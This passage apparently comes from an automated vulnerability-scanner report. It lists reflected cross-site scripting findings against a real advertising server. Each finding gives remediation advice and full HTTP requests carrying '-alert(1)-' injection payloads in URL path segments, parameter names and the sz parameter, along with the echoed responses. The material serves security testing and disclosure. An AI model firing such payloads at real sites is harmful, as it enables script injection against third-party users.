Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:26 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.600855956'-alert(1)-'8f11511390b/life;sz=728x90;net=q1;ord=957049792;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.10. http://a.collective-media.net/adj/q1.q.gc.6008/life [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0dbe'-alert(1)-'c276a0dda76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/lifed0dbe'-alert(1)-'c276a0dda76;sz=728x90;ord=957049792? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 16:04:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:27 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/lifed0dbe'-alert(1)-'c276a0dda76;sz=728x90;net=q1;ord=957049792;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.11. http://a.collective-media.net/adj/q1.q.gc.6008/life [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e74f'-alert(1)-'be7f0f43535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/life;sz=728x90;ord=957049792?&5e74f'-alert(1)-'be7f0f43535=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 09 May 2011 16:04:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:26 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/life;sz=728x90;net=q1;ord=957049792?&5e74f'-alert(1)-'be7f0f43535=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.12. http://a.collective-media.net/adj/q1.q.gc.6008/life [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8b9'-alert(1)-'66a150d2916 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/life;sz=728x90;ord=957049792?9d8b9'-alert(1)-'66a150d2916 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 09 May 2011 16:04:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/life;sz=728x90;net=q1;ord=957049792?9d8b9'-alert(1)-'66a150d2916;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.13. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94cec'-alert(1)-'4f83da16add was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj94cec'-alert(1)-'4f83da16add/q1.q.gc.6008/be_ent;sz=728x90;net=q1;ord=957008422;ord1=89470;cmpgurl=http%253A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%253Fodyssey%253Dmod%25257Cnewswell%25257Ctext%25257CHome%25257Cs? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:35 GMT
Connection: close
Content-Length: 7518

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-59060200_1304957015","http://ad.doubleclick.net/adj94cec'-alert(1)-'4f83da16add/q1.q.gc.6008/be_ent;net=q1;u=,q1-59060200_1304957015,11f8f328940989e,ent,am.h-am.b-q1.polit_h-q1.none_m-q1.ent_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;cmw=owl;s
...[SNIP]...
2.14. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d15e7'-alert(1)-'0953c28d3fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008d15e7'-alert(1)-'0953c28d3fb/be_ent;sz=728x90;net=q1;ord=957008422;ord1=89470;cmpgurl=http%253A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%253Fodyssey%253Dmod%25257Cnewswell%25257Ctext%25257CHome%25257Cs? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:36 GMT
Connection: close
Content-Length: 7510

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-23255911_1304957016","http://ad.doubleclick.net/adj/q1.q.gc.6008d15e7'-alert(1)-'0953c28d3fb/be_ent;net=q1;u=,q1-23255911_1304957016,11f8f328940989e,ent,am.h-am.b-q1.polit_h-q1.none_m-q1.ent_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net=q1;ord1=
...[SNIP]...
2.15. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ad73'-alert(1)-'138ba3ecdad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_ent6ad73'-alert(1)-'138ba3ecdad;sz=728x90;net=q1;ord=957008422;ord1=89470;cmpgurl=http%253A//www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup%253Fodyssey%253Dmod%25257Cnewswell%25257Ctext%25257CHome%25257Cs? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:36 GMT
Connection: close
Content-Length: 7510

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-90702160_1304957016","http://ad.doubleclick.net/adj/q1.q.gc.6008/be_ent6ad73'-alert(1)-'138ba3ecdad;net=q1;u=,q1-90702160_1304957016,11f8f328940989e,ent,am.h-am.b-q1.polit_h-q1.none_m-q1.ent_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net=q1;ord1=89470;c
...[SNIP]...
2.16. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ec2'-alert(1)-'5a2dc028ee6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_ent;sz=e1ec2'-alert(1)-'5a2dc028ee6 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:34 GMT
Connection: close
Content-Length: 7469

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
leclick.net/adj/q1.q.gc.6008/be_ent;net=q1;u=,q1-97327231_1304957014,11f8f328940989e,none,q1.polit_h-q1.none_m-q1.ent_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=e1ec2'-alert(1)-'5a2dc028ee6;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_m;btg=q1.ent_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h?","e1ec2'-alert(1)-'5a2dc
...[SNIP]...
2.17. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43428'-alert(1)-'fe57fc5744c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj43428'-alert(1)-'fe57fc5744c/q1.q.gc.6008/be_life;sz=728x90;net=q1;ord=957064653;ord1=489085;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:42 GMT
Connection: close
Content-Length: 7546

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-46299121_1304957082","http://ad.doubleclick.net/adj43428'-alert(1)-'fe57fc5744c/q1.q.gc.6008/be_life;net=q1;u=,q1-46299121_1304957082,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_
...[SNIP]...
2.18. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77ce8'-alert(1)-'aab4670083a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.600877ce8'-alert(1)-'aab4670083a/be_life;sz=728x90;net=q1;ord=957064653;ord1=489085;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:42 GMT
Connection: close
Content-Length: 7538

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-42375912_1304957082","http://ad.doubleclick.net/adj/q1.q.gc.600877ce8'-alert(1)-'aab4670083a/be_life;net=q1;u=,q1-42375912_1304957082,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;
...[SNIP]...
2.19. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46e4f'-alert(1)-'496a9811112 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_life46e4f'-alert(1)-'496a9811112;sz=728x90;net=q1;ord=957064653;ord1=489085;cmpgurl=http%253A//www.courier-journal.com/section/FEATURES? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:43 GMT
Connection: close
Content-Length: 7538

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-72076114_1304957083","http://ad.doubleclick.net/adj/q1.q.gc.6008/be_life46e4f'-alert(1)-'496a9811112;net=q1;u=,q1-72076114_1304957083,11f8f328940989e,food,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=728x90;net=q1;o
...[SNIP]...
2.20. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6008/be_life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e2c6'-alert(1)-'43692c066ec was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6008/be_life;sz=1e2c6'-alert(1)-'43692c066ec HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:41 GMT
Connection: close
Content-Length: 7494

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
/adj/q1.q.gc.6008/be_life;net=q1;u=,q1-27248253_1304957081,11f8f328940989e,none,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=1e2c6'-alert(1)-'43692c066ec;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h?","1e2c6'-a
...[SNIP]...
2.21. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 1]  previous  next

Summary

